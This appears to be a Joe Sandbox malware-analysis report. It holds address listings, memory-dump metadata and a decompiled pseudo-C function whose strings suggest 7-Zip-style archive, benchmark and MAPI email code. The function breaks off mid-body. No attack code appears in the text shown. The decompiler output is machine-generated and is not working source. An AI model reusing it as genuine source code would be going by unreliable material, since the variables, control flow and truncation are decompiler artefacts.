                                                                                                    0x00000000
                                                                                                    0x003caca5
                                                                                                    0x003cac92
                                                                                                    0x003cac03
                                                                                                    0x003cac0e
                                                                                                    0x003cac17
                                                                                                    0x003cac20
                                                                                                    0x003cac28
                                                                                                    0x003cac2d
                                                                                                    0x003cac30
                                                                                                    0x00000000
                                                                                                    0x003cac36
                                                                                                    0x003cac36
                                                                                                    0x00000000
                                                                                                    0x003cac36
                                                                                                    0x003cac30
                                                                                                    0x003cab9e
                                                                                                    0x003caba9
                                                                                                    0x003cabb2
                                                                                                    0x003cabbb
                                                                                                    0x003cabc3
                                                                                                    0x003cabc8
                                                                                                    0x003cabcb
                                                                                                    0x00000000
                                                                                                    0x003cabd1
                                                                                                    0x003cabd7
                                                                                                    0x003cabe1
                                                                                                    0x00000000
                                                                                                    0x003cabe1
                                                                                                    0x003cabcb
                                                                                                    0x003caa85
                                                                                                    0x003caa88
                                                                                                    0x003caf6b
                                                                                                    0x00000000
                                                                                                    0x003caf6b
                                                                                                    0x003caa8e
                                                                                                    0x003caa95
                                                                                                    0x003caaa5
                                                                                                    0x003caaa9
                                                                                                    0x003caaae
                                                                                                    0x003caab0
                                                                                                    0x003caf91
                                                                                                    0x003caf96
                                                                                                    0x003caf77
                                                                                                    0x003caf7d
                                                                                                    0x00000000
                                                                                                    0x003caf7d
                                                                                                    0x003caac0
                                                                                                    0x003caac5
                                                                                                    0x003caac7
                                                                                                    0x00000000
                                                                                                    0x003caacd
                                                                                                    0x003caacd
                                                                                                    0x003caacf
                                                                                                    0x003caada
                                                                                                    0x003caadc
                                                                                                    0x003caadc
                                                                                                    0x003caae6
                                                                                                    0x003caaef
                                                                                                    0x003caaef
                                                                                                    0x003caaf2
                                                                                                    0x003caaf7
                                                                                                    0x003caaf9
                                                                                                    0x003caf72
                                                                                                    0x003caf72
                                                                                                    0x00000000
                                                                                                    0x003caf72
                                                                                                    0x003caaff
                                                                                                    0x003cab02
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cab0c
                                                                                                    0x003cab11
                                                                                                    0x003cab13
                                                                                                    0x003cab1e
                                                                                                    0x003cab2f
                                                                                                    0x003cab33
                                                                                                    0x003cab38
                                                                                                    0x003cab3a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cab40
                                                                                                    0x003cab46
                                                                                                    0x003caf9a
                                                                                                    0x00000000
                                                                                                    0x003cab4c
                                                                                                    0x003cab52
                                                                                                    0x00000000
                                                                                                    0x003cab52
                                                                                                    0x003cab46
                                                                                                    0x003cab15
                                                                                                    0x003cab18
                                                                                                    0x003caf8a
                                                                                                    0x00000000
                                                                                                    0x003caf8a
                                                                                                    0x00000000
                                                                                                    0x003cab18
                                                                                                    0x003cad14
                                                                                                    0x003cad17
                                                                                                    0x003cad1b
                                                                                                    0x003cad20
                                                                                                    0x003cad27
                                                                                                    0x003cad2a
                                                                                                    0x003cad2a
                                                                                                    0x00000000
                                                                                                    0x003caa54
                                                                                                    0x003ca9ac
                                                                                                    0x003ca9af
                                                                                                    0x003ca9b2
                                                                                                    0x003ca9b5
                                                                                                    0x003caa34
                                                                                                    0x003caa34
                                                                                                    0x003caa37
                                                                                                    0x003caa3a
                                                                                                    0x003caa3e
                                                                                                    0x003caa40
                                                                                                    0x003caa40
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ca9b7
                                                                                                    0x003ca9b7
                                                                                                    0x003ca9c4
                                                                                                    0x003ca9cb
                                                                                                    0x003ca9d2
                                                                                                    0x003ca9d9
                                                                                                    0x003ca9de
                                                                                                    0x003ca9e2
                                                                                                    0x003ca9e4
                                                                                                    0x003ca9eb
                                                                                                    0x003ca9f0
                                                                                                    0x003ca9f4
                                                                                                    0x003ca9ff
                                                                                                    0x003caa07
                                                                                                    0x003caa0e
                                                                                                    0x003caa13
                                                                                                    0x003caa17
                                                                                                    0x003caa19
                                                                                                    0x003caa20
                                                                                                    0x003caa25
                                                                                                    0x003caa26
                                                                                                    0x003caa29
                                                                                                    0x003caa2c
                                                                                                    0x003caa2f
                                                                                                    0x003caa2f
                                                                                                    0x00000000
                                                                                                    0x003ca9b7
                                                                                                    0x003ca907
                                                                                                    0x003ca90c
                                                                                                    0x003ca90e
                                                                                                    0x00000000
                                                                                                    0x003ca910
                                                                                                    0x003ca916
                                                                                                    0x00000000
                                                                                                    0x003ca916
                                                                                                    0x003ca8c7
                                                                                                    0x003ca8c7
                                                                                                    0x003ccb47
                                                                                                    0x003ccb4d
                                                                                                    0x003ccb55
                                                                                                    0x003ccb55

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003CA8AB
                                                                                                      • Part of subcall function 003CD9F2: __EH_prolog.LIBCMT ref: 003CD9F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: $ $ $ (Cmplx)$*$@$@$AES128$AES192$Avg:$Avr:$CPU$CPU hardware threads:$CRC$Compressing$Decompressing$Dict$Dictionary reduced to: $E/U$Effec$KiB/s$LZMA$MB/s$MIPS$Method$R/U$Rating$Size$Speed$T CPU Freq (MHz):$THRD$Tot:$Usage$crc32$file$file size =$freq$freq=$hash$mts$size: $tic$time$timems
                                                                                                    • API String ID: 3519838083-768847781
                                                                                                    • Opcode ID: ad0cb50d86ea3a4ef410f9440f7b7f2fb791c3d28532185e44d81166e36d8dcb
                                                                                                    • Instruction ID: e4b44ba27ca500f525893aecebf1c4ec69b575a5177729588dfdc35bc3a3e16e
                                                                                                    • Opcode Fuzzy Hash: ad0cb50d86ea3a4ef410f9440f7b7f2fb791c3d28532185e44d81166e36d8dcb
                                                                                                    • Instruction Fuzzy Hash: A6336931E002589FDF26DFA4C895BEDBBB2AF44304F1580ADE509AB291DB349E85CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003DE64C Relevance: 63.2, APIs: 15, Strings: 20, Instructions: 1923timelibraryloaderCOMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E003DE64C(intOrPtr __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t984;
				signed int _t1005;
				signed int _t1007;
				signed int _t1015;
				char _t1019;
				signed int _t1044;
				signed int _t1064;
				void* _t1066;
				signed char _t1076;
				signed int _t1077;
				signed int _t1081;
				signed int _t1083;
				signed int _t1086;
				signed int _t1089;
				signed int _t1091;
				signed int _t1101;
				signed int _t1102;
				_Unknown_base(*)()* _t1104;
				_Unknown_base(*)()* _t1105;
				intOrPtr _t1127;
				intOrPtr* _t1135;
				void* _t1140;
				void* _t1142;
				void* _t1144;
				void* _t1148;
				signed int _t1151;
				intOrPtr _t1186;
				long _t1194;
				void* _t1205;
				void* _t1232;
				signed int _t1235;
				signed int _t1254;
				intOrPtr* _t1277;
				intOrPtr _t1278;
				void* _t1289;
				void* _t1290;
				signed int _t1293;
				void* _t1327;
				signed int _t1338;
				void* _t1342;
				void* _t1352;
				intOrPtr* _t1377;
				signed int _t1380;
				void* _t1387;
				void* _t1397;
				void* _t1401;
				signed int _t1407;
				void* _t1411;
				void _t1413;
				void* _t1418;
				void* _t1425;
				void* _t1441;
				void* _t1442;
				void* _t1461;
				signed int _t1463;
				signed int _t1468;
				signed int _t1495;
				signed int _t1496;
				signed int _t1509;
				void* _t1526;
				void* _t1545;
				struct HINSTANCE__* _t1549;
				void* _t1576;
				intOrPtr* _t1756;
				signed int _t1771;
				void* _t1775;
				intOrPtr _t1780;
				void* _t1830;
				signed int _t1840;
				signed int _t1842;
				signed int _t1845;
				signed int _t1847;
				signed int _t1849;
				intOrPtr* _t1850;
				signed int _t1853;
				int _t1855;
				signed int* _t1858;
				signed int _t1859;
				signed int _t1860;
				signed int _t1861;
				signed int* _t1862;
				signed int* _t1863;
				intOrPtr _t1864;
				signed int _t1866;
				signed int* _t1867;
				signed int _t1869;
				void* _t1870;
				signed int _t1871;
				void* _t1872;
				signed int _t1873;
				signed int _t1882;
				signed int _t1883;
				struct HINSTANCE__* _t1884;
				signed int _t1886;
				signed int _t1887;
				void* _t1888;
				signed int _t1889;
				void* _t1891;
				void* _t1892;
				void* _t1893;
				void* _t1894;
				signed int _t1895;
				void* _t1898;
				void* _t1900;
				intOrPtr* _t1901;

				_t1831 = __edx;
				E0041F1B0(0x425b4e, _t1898);
				_t1901 = _t1900 - 0x2f4;
				_t1470 =  *(_t1898 + 0x10);
				 *((intOrPtr*)(_t1898 - 0x10)) = _t1901;
				 *(_t1898 - 0xb8) = __edx;
				 *((intOrPtr*)(_t1898 - 0x68)) = __ecx;
				if(_t1470[1] == 0 || _t1470[1] == 0) {
					_t1842 = 1;
					if( *((intOrPtr*)(_t1831 + 4)) > _t1842) {
						L72:
						_t984 = 0x80004001;
						goto L271;
					}
					 *(_t1898 + 0x13) = _t1470[0x3c] != 0;
					if( *(_t1898 + 0x13) == 0 || _t1470[0x17] == _t1842) {
						__eflags = _t1470[2];
						if(_t1470[2] == 0) {
							L11:
							E003B4E6C( *(_t1898 + 0xc), _t1898, _t1470[7]);
							E003D0710( *(_t1898 + 0xc));
							E003B4E21( *(_t1898 + 0xc));
							__eflags = _t1470[0x3f];
							if(_t1470[0x3f] <= 0) {
								L13:
								__eflags = _t1470[0];
								if(_t1470[0] == 0) {
									L24:
									L003D1784(_t1898 - 0x1ac);
									__eflags =  *(_t1898 + 0x20);
									_t1882 = 5;
									 *(_t1898 - 4) = _t1882;
									if(__eflags == 0) {
										L28:
										_t1844 =  &(_t1470[0x19]);
										_push(_t1898 - 0x58);
										E003DE1A3( &(_t1470[0x19]), _t1831, __eflags);
										__eflags = _t1470[0x3f];
										 *(_t1898 - 4) = 6;
										if(__eflags != 0) {
											_t1441 = E003DE223(_t1844, _t1831, __eflags);
											 *(_t1898 - 4) = 7;
											_t1442 = E003B2F2F(_t1898 - 0x58, _t1441);
											 *(_t1898 - 4) = 6;
											E003B1E40(_t1442,  *(_t1898 - 0x28));
											 *_t1901 = ".001";
											E003B3164(_t1898 - 0x58, _t1898 - 0x28);
										}
										_t1845 =  *(_t1898 + 8);
										__eflags =  *(_t1845 + 4);
										if( *(_t1845 + 4) != 0) {
											L33:
											E003B64DB(_t1898 - 0xfc);
											E003B2D47(_t1898 - 0xd4);
											_push(1);
											_push( *(_t1898 - 0x58));
											 *(_t1898 - 4) = 8;
											_t993 = E003B695D(_t1898 - 0xfc);
											__eflags = _t993;
											if(_t993 != 0) {
												_t995 =  *(_t1898 - 0xdc) >> 4;
												__eflags =  *(_t1898 - 0xdc) >> 0x00000004 & 0x00000001;
												if(__eflags == 0) {
													__eflags =  *((char*)(_t1898 - 0xd7));
													if( *((char*)(_t1898 - 0xd7)) == 0) {
														__eflags = _t1470[1];
														if(_t1470[1] != 0) {
															L48:
															__eflags = _t1470[0x3f];
															if(_t1470[0x3f] <= 0) {
																E003FD423(_t1898 - 0x74);
																__eflags = _t1470[8];
																 *(_t1898 - 4) = 9;
																if(_t1470[8] != 0) {
																	E003EF23F(_t1898 - 0x74);
																	L003D1F61(_t1898 - 0x74, _t1845, _t1882,  &(_t1470[0xa]));
																}
																 *(_t1898 - 0x1c) = 0;
																 *(_t1898 - 0x18) = 0;
																 *((intOrPtr*)(_t1898 - 0x14)) = 0;
																 *(_t1898 - 4) = 0xa;
																E003D16ED(_t1898 - 0x300);
																 *(_t1898 - 0x2bc) =  *(_t1898 - 0x2bc) & 0x00000000;
																 *(_t1898 - 0x2c0) =  &(_t1470[0x12]);
																 *((intOrPtr*)(_t1898 - 0x300)) =  *((intOrPtr*)(_t1898 - 0x68));
																 *((intOrPtr*)(_t1898 - 0x2d8)) = _t1898 - 0x74;
																 *((intOrPtr*)(_t1898 - 0x2d4)) = _t1898 - 0x1c;
																 *(_t1898 - 4) = 0xb;
																 *((intOrPtr*)(_t1898 - 0x2d0)) = 0;
																E003B2F2F(_t1898 - 0x2b8, _t1898 - 0x58);
																_t1883 =  *(_t1898 + 0x1c);
																_t1005 =  *((intOrPtr*)( *_t1883 + 0x48))( *(_t1898 - 0x58));
																__eflags = _t1005;
																if(__eflags == 0) {
																	_t1007 = L003DCAA9(_t1898 - 0x1ac, __eflags, _t1898 - 0x300,  *(_t1898 + 0x18));
																	_t1847 = _t1007;
																	__eflags = _t1847;
																	if(_t1847 != 0) {
																		L57:
																		_t1005 = 0x80004004;
																		__eflags = _t1847 - 0x80004004;
																		if(_t1847 == 0x80004004) {
																			goto L53;
																		}
																		L58:
																		_t1005 =  *((intOrPtr*)( *_t1883 + 0x3c))( *((intOrPtr*)(_t1898 - 0x68)), _t1898 - 0x1ac,  *(_t1898 - 0x58), _t1847);
																		__eflags = _t1005;
																		if(_t1005 != 0) {
																			goto L53;
																		}
																		__eflags = _t1847;
																		if(_t1847 != 0) {
																			goto L62;
																		}
																		__eflags =  *((intOrPtr*)(_t1898 - 0x19c)) - 1;
																		if( *((intOrPtr*)(_t1898 - 0x19c)) <= 1) {
																			_t1495 =  *(_t1898 - 0x1ac);
																			__eflags =  *((char*)(_t1898 - 0xd7));
																			_t1015 =  *((intOrPtr*)(_t1495 +  *(_t1898 - 0x1a8) * 4 - 4));
																			_t1496 = _t1495 & 0xffffff00 |  *((char*)(_t1898 - 0xd7)) == 0x00000000;
																			__eflags = _t1496;
																			 *(_t1015 + 0x4f) = _t1496;
																			if(_t1496 != 0) {
																				 *(_t1015 + 0x44) =  *(_t1898 - 0xe4);
																				_t160 = _t1015 + 0x4e;
																				 *_t160 =  *(_t1015 + 0x4e) & 0x00000000;
																				__eflags =  *_t160;
																				 *((intOrPtr*)(_t1015 + 0x48)) =  *((intOrPtr*)(_t1898 - 0xe0));
																				 *((short*)(_t1015 + 0x4c)) = 0x17;
																			}
																			__eflags =  *((char*)(_t1015 + 0x78));
																			if( *((char*)(_t1015 + 0x78)) == 0) {
																				__eflags = _t1470[0xa];
																				if(__eflags >= 0) {
																					L73:
																					E003B1E40(E003B1E40(_t1015,  *((intOrPtr*)(_t1898 - 0x2b8))),  *(_t1898 - 0x1c));
																					 *(_t1898 - 4) = 8;
																					_t993 = L003D1EAB(_t1898 - 0x74);
																					L75:
																					 *(_t1898 - 4) = 6;
																					E003B1E40(_t993,  *((intOrPtr*)(_t1898 - 0xd4)));
																					L77:
																					__eflags = _t1470[0xa];
																					if(_t1470[0xa] >= 0) {
																						L80:
																						_t1019 =  *((intOrPtr*)(_t1898 - 0x18c));
																						__eflags = _t1019;
																						 *((char*)(_t1898 + 0x23)) = _t1019;
																						if(_t1019 != 0) {
																							L83:
																							E003CEE23(_t1898 - 0x24c);
																							asm("sbb eax, eax");
																							 *(_t1898 - 4) = 0xd;
																							 *(_t1898 - 0x1b4) =  ~_t1883 & _t1883 + 0x00000004;
																							E003D2F93(_t1898 - 0x29c, __eflags);
																							__eflags = _t1470[1];
																							 *(_t1898 - 4) = 0xe;
																							 *(_t1898 + 0x18) = 0;
																							if(__eflags == 0) {
																								 *(_t1898 + 0xb) =  *(_t1898 + 0xb) & 0x00000000;
																								__eflags =  *(_t1898 + 0x13);
																								if( *(_t1898 + 0x13) != 0) {
																									L112:
																									E003B2D47(_t1898 - 0xb4);
																									 *(_t1898 + 0xb) =  *(_t1898 + 0xb) & 0x00000000;
																									 *(_t1898 - 0x9c) =  *(_t1898 - 0x9c) & 0x00000000;
																									 *(_t1898 - 4) = 0x13;
																									E003B2D47(_t1898 - 0x98);
																									__eflags = _t1470[1];
																									 *(_t1898 - 4) = 0x14;
																									if(_t1470[1] != 0) {
																										__eflags = _t1470[2];
																										if(__eflags != 0) {
																											_push( *0x42bc28);
																											E003B640A(_t1898 - 0x9c, __eflags);
																											E003B2F2F(_t1898 - 0xb4, _t1898 - 0x98);
																											E003B8274(_t1898 - 0xb4);
																											 *(_t1898 + 0xb) = 1;
																										}
																									}
																									E003FD423(_t1898 - 0x44);
																									 *(_t1898 + 0x13) =  *(_t1898 + 0x13) & 0x00000000;
																									__eflags = _t1470[1];
																									 *(_t1898 - 4) = 0x15;
																									if(_t1470[1] != 0) {
																										L125:
																										__eflags = _t1470[2];
																										if(_t1470[2] == 0) {
																											L134:
																											_t1884 = 0;
																											_t1849 = 0;
																											__eflags = _t1470[0x17];
																											if(_t1470[0x17] <= 0) {
																												L144:
																												E003FD423(_t1898 - 0xa8);
																												__eflags =  *((char*)(_t1898 + 0x23));
																												 *(_t1898 - 4) = 0x1c;
																												if(__eflags == 0) {
																													L152:
																													 *(_t1898 - 0x4c) = _t1884;
																													 *(_t1898 - 0x48) = _t1884;
																													__eflags = _t1470[2];
																													 *(_t1898 - 4) = 0x1f;
																													if(_t1470[2] == 0) {
																														L155:
																														E003FD423(_t1898 - 0x8c);
																														__eflags = _t1470[0x17] - _t1884;
																														 *(_t1898 - 4) = 0x20;
																														 *(_t1898 + 0xc) = _t1884;
																														if(_t1470[0x17] <= _t1884) {
																															L170:
																															__eflags =  *((char*)(_t1898 + 0x23));
																															if( *((char*)(_t1898 + 0x23)) == 0) {
																																L177:
																																_t1509 = 0;
																																__eflags =  *((intOrPtr*)(_t1898 - 0x88)) - _t1884;
																																if( *((intOrPtr*)(_t1898 - 0x88)) <= _t1884) {
																																	L181:
																																	_t1847 = E003E02DA(_t1898 - 0x8c, _t1831);
																																	__eflags = _t1847 - _t1884;
																																	if(_t1847 == _t1884) {
																																		E003D6B24(_t1898 - 0x44);
																																		__eflags =  *(_t1898 + 0x13);
																																		if(__eflags == 0) {
																																			L195:
																																			__eflags = _t1470[1];
																																			if(__eflags == 0) {
																																				L239:
																																				__eflags = _t1470[2];
																																				if(_t1470[2] == 0) {
																																					L270:
																																					 *(_t1898 - 4) = 0x1f;
																																					L003E19BD(_t1898 - 0x8c);
																																					 *(_t1898 - 4) = 0x1c;
																																					L00403D87(_t1898 - 0x4c);
																																					 *(_t1898 - 4) = 0x15;
																																					L003E1A10(_t1470, _t1898 - 0xa8);
																																					 *(_t1898 - 4) = 0x14;
																																					E003E02AB(_t1470, _t1898 - 0x44);
																																					 *(_t1898 - 4) = 0x13;
																																					E003E01F4(_t1898 - 0x9c);
																																					L00403D87(_t1898 - 0xb4);
																																					 *(_t1898 - 4) = 0xd;
																																					E003D0C01(_t1898 - 0x29c);
																																					 *(_t1898 - 4) = 6;
																																					E003D06AE(_t1898 - 0x24c);
																																					L00403D87(_t1898 - 0x58);
																																					 *(_t1898 - 4) =  *(_t1898 - 4) | 0xffffffff;
																																					L003D1830(_t1470, _t1898 - 0x1ac);
																																					_t984 = 0;
																																					__eflags = 0;
																																					goto L271;
																																				}
																																				 *(_t1898 - 0x64) = _t1884;
																																				 *(_t1898 - 0x60) = _t1884;
																																				 *(_t1898 - 0x5c) = _t1884;
																																				 *(_t1898 - 4) = 0x50;
																																				E003FD423(_t1898 - 0x28);
																																				__eflags =  *(_t1898 - 0x224) - _t1884;
																																				 *(_t1898 - 4) = 0x51;
																																				 *(_t1898 + 0x20) = _t1884;
																																				if( *(_t1898 - 0x224) <= _t1884) {
																																					L259:
																																					E003C66C0(_t1898 - 0x64);
																																					_t1470 = 0;
																																					_t1044 = L00403A60(_t1898 - 0x64);
																																					__eflags = _t1044;
																																					if(_t1044 <= 0) {
																																						L264:
																																						_t1847 =  *((intOrPtr*)( *( *(_t1898 + 0x1c)) + 0x58))();
																																						 *(_t1898 - 4) = 0x50;
																																						__eflags = _t1847 - _t1884;
																																						_t1526 = _t1898 - 0x28;
																																						if(_t1847 == _t1884) {
																																							E003D0A72(_t1470, _t1526);
																																							 *(_t1898 - 4) = 0x20;
																																							L00403D87(_t1898 - 0x64);
																																							goto L270;
																																						}
																																						L265:
																																						E003D0A72(_t1470, _t1526);
																																						 *(_t1898 - 4) = 0x20;
																																						L00403D87(_t1898 - 0x64);
																																						 *(_t1898 - 4) = 0x1f;
																																						L003E19BD(_t1898 - 0x8c);
																																						 *(_t1898 - 4) = 0x1c;
																																						L00403D87(_t1898 - 0x4c);
																																						 *(_t1898 - 4) = 0x15;
																																						L003E1A10(_t1470, _t1898 - 0xa8);
																																						 *(_t1898 - 4) = 0x14;
																																						E003E02AB(_t1470, _t1898 - 0x44);
																																						 *(_t1898 - 4) = 0x13;
																																						E003E01F4(_t1898 - 0x9c);
																																						L00403D87(_t1898 - 0xb4);
																																						 *(_t1898 - 4) = 0xd;
																																						E003D0C01(_t1898 - 0x29c);
																																						 *(_t1898 - 4) = 6;
																																						E003D06AE(_t1898 - 0x24c);
																																						L00403D87(_t1898 - 0x58);
																																						goto L266;
																																					} else {
																																						goto L260;
																																					}
																																					do {
																																						L260:
																																						E003CED4D(_t1898 - 0x24c, _t1898 - 0x80,  *((intOrPtr*)(L00403AA6(_t1898 - 0x64, _t1470) + 4)));
																																						 *(_t1898 - 4) = 0x54;
																																						_t1064 = E003E01DE(L00403A5D(_t1898 - 0x80), __eflags);
																																						__eflags = _t1064;
																																						if(_t1064 == 0) {
																																							goto L263;
																																						}
																																						_t1847 =  *((intOrPtr*)( *( *(_t1898 + 0x1c)) + 0x54))(_t1898 - 0x80, 1);
																																						_t1545 = _t1898 - 0x80;
																																						__eflags = _t1847 - _t1884;
																																						if(_t1847 != _t1884) {
																																							L268:
																																							L00403D87(_t1545);
																																							 *(_t1898 - 4) = 0x50;
																																							_t1526 = _t1898 - 0x28;
																																							goto L265;
																																						}
																																						L003B5803(L00403A5D(_t1545));
																																						L263:
																																						 *(_t1898 - 4) = 0x51;
																																						L00403D87(_t1898 - 0x80);
																																						_t1470 =  &(_t1470[0]);
																																						_t1066 = L00403A60(_t1898 - 0x64);
																																						__eflags = _t1470 - _t1066;
																																					} while (_t1470 < _t1066);
																																					goto L264;
																																				} else {
																																					goto L241;
																																				}
																																				do {
																																					L241:
																																					_t1850 =  *((intOrPtr*)( *((intOrPtr*)(_t1898 - 0x228)) +  *(_t1898 + 0x20) * 4));
																																					E003CED4D(_t1898 - 0x24c, _t1898 - 0x38,  *(_t1898 + 0x20));
																																					 *(_t1898 - 4) = 0x52;
																																					_t1076 =  *(_t1850 + 0x20) >> 4;
																																					__eflags = _t1076 & 0x00000001;
																																					if((_t1076 & 0x00000001) == 0) {
																																						_t1077 =  *(_t1898 - 0x4c);
																																						_t1549 =  *(_t1898 + 0x20);
																																						__eflags =  *((char*)(_t1549 + _t1077));
																																						if( *((char*)(_t1549 + _t1077)) == 0) {
																																							goto L258;
																																						}
																																						E003B64DB(_t1898 - 0xfc);
																																						_t1081 = E003B2D47(_t1898 - 0xd4);
																																						__eflags = _t1470[4];
																																						 *(_t1898 - 4) = 0x53;
																																						_push(_t1081 & 0xffffff00 | _t1470[4] == 0x00000000);
																																						_push( *(_t1898 - 0x38));
																																						_t1083 = E003B695D(_t1898 - 0xfc);
																																						__eflags = _t1083;
																																						if(_t1083 == 0) {
																																							L257:
																																							 *(_t1898 - 4) = 0x52;
																																							L003B5D62(_t1898 - 0xfc);
																																							goto L258;
																																						}
																																						__eflags = _t1470[4];
																																						if(_t1470[4] == 0) {
																																							L249:
																																							__eflags =  *(_t1898 - 0xfc) -  *_t1850;
																																							if( *(_t1898 - 0xfc) !=  *_t1850) {
																																								L251:
																																								_t1086 = 0;
																																								__eflags = 0;
																																								L252:
																																								__eflags = _t1086;
																																								if(_t1086 == 0) {
																																									goto L257;
																																								}
																																								L253:
																																								_t899 = _t1850 + 0x18; // 0x18
																																								_t1089 = CompareFileTime(_t1898 - 0xe4, _t899);
																																								__eflags = _t1089;
																																								if(_t1089 != 0) {
																																									goto L257;
																																								}
																																								_t1091 = CompareFileTime(_t1898 - 0xf4, _t1850 + 8);
																																								__eflags = _t1091;
																																								if(_t1091 != 0) {
																																									goto L257;
																																								}
																																								_t1847 =  *((intOrPtr*)( *( *(_t1898 + 0x1c)) + 0x54))(_t1898 - 0x38, _t1884);
																																								__eflags = _t1847 - _t1884;
																																								if(__eflags != 0) {
																																									 *(_t1898 - 4) = 0x52;
																																									L003B5D62(_t1898 - 0xfc);
																																									_t1545 = _t1898 - 0x38;
																																									goto L268;
																																								}
																																								L003B5D6C(L00403A5D(_t1898 - 0x38), __eflags);
																																								goto L257;
																																							}
																																							__eflags =  *((intOrPtr*)(_t1898 - 0xf8)) -  *((intOrPtr*)(_t1850 + 4));
																																							if( *((intOrPtr*)(_t1898 - 0xf8)) ==  *((intOrPtr*)(_t1850 + 4))) {
																																								goto L253;
																																							}
																																							goto L251;
																																						}
																																						__eflags =  *((intOrPtr*)(_t1850 + 0x38)) - _t1884;
																																						if( *((intOrPtr*)(_t1850 + 0x38)) != _t1884) {
																																							L248:
																																							_t1086 = E003E01E5(_t1898 - 0xfc);
																																							goto L252;
																																						}
																																						__eflags =  *((intOrPtr*)(_t1850 + 0x40)) - _t1884;
																																						if( *((intOrPtr*)(_t1850 + 0x40)) == _t1884) {
																																							goto L249;
																																						}
																																						goto L248;
																																					}
																																					 *(_t1898 - 0x6c) =  *(_t1898 + 0x20);
																																					L003C631D(_t1898 - 0x70,  *(_t1898 - 0x38));
																																					L00403F6D(_t1898 - 0x64);
																																					_t1101 =  *(_t1898 - 0x60);
																																					 *(_t1898 - 0x60) =  *(_t1898 - 0x60) + 1;
																																					 *( *(_t1898 - 0x64) + _t1101 * 8) =  *(_t1898 - 0x70);
																																					 *( *(_t1898 - 0x64) + 4 + _t1101 * 8) =  *(_t1898 - 0x6c);
																																					_t1884 = 0;
																																					L258:
																																					 *(_t1898 - 4) = 0x51;
																																					L00403D87(_t1898 - 0x38);
																																					 *(_t1898 + 0x20) =  &( *(_t1898 + 0x20)->i);
																																					__eflags =  *(_t1898 + 0x20) -  *(_t1898 - 0x224);
																																				} while ( *(_t1898 + 0x20) <  *(_t1898 - 0x224));
																																				goto L259;
																																			}
																																			 *(_t1898 + 0x20) = _t1884;
																																			 *(_t1898 - 4) = 0x34;
																																			_t1102 = E003B5483(_t1898 + 0x20, __eflags, L"Mapi32.dll");
																																			__eflags = _t1102;
																																			if(_t1102 != 0) {
																																				E003FD423(_t1898 - 0x74);
																																				_t1853 = 0;
																																				__eflags = _t1470[0x17] - _t1884;
																																				 *(_t1898 - 4) = 0x37;
																																				if(__eflags <= 0) {
																																					L206:
																																					_t1104 = GetProcAddress( *(_t1898 + 0x20), "MAPISendMailW");
																																					__eflags = _t1104 - _t1884;
																																					 *(_t1898 + 0xc) = _t1104;
																																					if(_t1104 == _t1884) {
																																						_t1105 = GetProcAddress( *(_t1898 + 0x20), "MAPISendMail");
																																						__eflags = _t1105 - _t1884;
																																						 *(_t1898 + 0xc) = _t1105;
																																						if(_t1105 != _t1884) {
																																							E003B2D47(_t1898 - 0x13c);
																																							 *(_t1898 - 4) = 0x46;
																																							 *((char*)(_t1898 - 0x130)) = 1;
																																							E003B601D(_t1898 - 0x13c);
																																							 *(_t1898 - 4) = 0x47;
																																							E003FD423(_t1898 - 0x38);
																																							 *(_t1898 - 4) = 0x48;
																																							E003FD423(_t1898 - 0xc4);
																																							_t1886 = 0;
																																							 *(_t1898 - 4) = 0x49;
																																							__eflags =  *(_t1898 - 0x70);
																																							if(__eflags <= 0) {
																																								L231:
																																								_t1855 = 0;
																																								 *(_t1898 - 0x1c) = 0;
																																								 *(_t1898 - 0x18) = 0;
																																								 *((intOrPtr*)(_t1898 - 0x14)) = 0;
																																								_t1887 =  *(_t1898 - 0x34);
																																								 *(_t1898 - 4) = 0x4e;
																																								L003E1C87(_t1898 - 0x1c, _t1887);
																																								__eflags =  *(_t1898 - 0x34);
																																								 *(_t1898 - 0x18) = _t1887;
																																								if( *(_t1898 - 0x34) <= 0) {
																																									L235:
																																									memset(_t1898 - 0xf4, _t1855, 0x30);
																																									 *(_t1898 - 0xcc) =  *(_t1898 - 0x18);
																																									 *(_t1898 - 0xc8) =  *(_t1898 - 0x1c);
																																									E003C0AB6();
																																									__eflags =  *(_t1898 - 0x24) - _t1855;
																																									 *(_t1898 - 4) = 0x4f;
																																									if( *(_t1898 - 0x24) != _t1855) {
																																										memset(_t1898 - 0x12c, _t1855, 0x18);
																																										 *(_t1898 - 0x120) =  *(_t1898 - 0x28);
																																										_t1127 = 1;
																																										 *((intOrPtr*)(_t1898 - 0x128)) = _t1127;
																																										 *((intOrPtr*)(_t1898 - 0xd4)) = _t1127;
																																										 *((intOrPtr*)(_t1898 - 0xd0)) = _t1898 - 0x12c;
																																									}
																																									E003B1E40(E003B1E40( *(_t1898 + 0xc)(_t1855, _t1855, _t1898 - 0xf4, 8, _t1855),  *(_t1898 - 0x28)),  *(_t1898 - 0x1c));
																																									 *(_t1898 - 4) = 0x48;
																																									E003D0A72(_t1470, _t1898 - 0xc4);
																																									 *(_t1898 - 4) = 0x47;
																																									E003D0A72(_t1470, _t1898 - 0x38);
																																									 *(_t1898 - 4) = 0x37;
																																									_t1576 = _t1898 - 0x13c;
																																									L238:
																																									E003E0224(_t1576);
																																									 *(_t1898 - 4) = 0x34;
																																									E003D0A72(_t1470, _t1898 - 0x74);
